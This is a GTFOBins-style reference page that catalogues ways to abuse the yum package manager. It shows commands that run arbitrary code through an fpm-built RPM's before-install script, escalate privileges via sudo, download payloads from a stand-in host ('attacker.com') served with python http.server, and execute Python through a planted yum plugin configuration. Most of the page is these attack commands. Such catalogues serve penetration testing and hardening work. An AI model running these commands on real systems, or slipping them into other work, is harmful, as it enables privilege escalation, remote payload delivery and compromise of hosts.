.. / yum

Sponsor Fork Star

• Command
• Download
• Inherit
• Shell
• Reverse shell
• File write
• File read
• Upload
• Download
• Library load

Command

This executable can run non-interactive system commands.

• Comment

  Generate the RPM package with fpm and upload it to the target.

  echo /path/to/command >x.sh
  fpm -n x -s dir -t rpm -a all --before-install .x.sh .
  

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  yum localinstall -y x-1.0-1.noarch.rpm

Download

This executable can download remote data.

• Comment

  The file on the remote host must have the .rpm extension, but the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in /var/tmp/yum-root-xxxxxx/.

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  yum install http://attacker.com/path/to/input-file.rpm

  Sender

  An HTTP server can be used on the attacker box to send the data.

  python -m http.server 80

Inherit

This executable can inherit functions from another.

• Comment

  This allows to run Python code (...).

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  cat >/path/to/temp-dir/x<<EOF
  [main]
  plugins=1
  pluginpath=/path/to/temp-dir/
  pluginconfpath=/path/to/temp-dir/
  EOF
  
  cat >/path/to/temp-dir/y.conf<<EOF
  [main]
  enabled=1
  EOF
  
  cat >/path/to/temp-dir/y.py<<EOF
  import yum
  from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
  requires_api_version='2.1'
  def init_hook(conduit):
    ...
  EOF
  
  yum -c /path/to/temp-dir/x --enableplugin=y

  Functions

  Inherits from python, thus possibly granting the following functions:

  • Shell
  • Reverse shell
  • File write
  • File read
  • Upload
  • Download
  • Library load

Source | History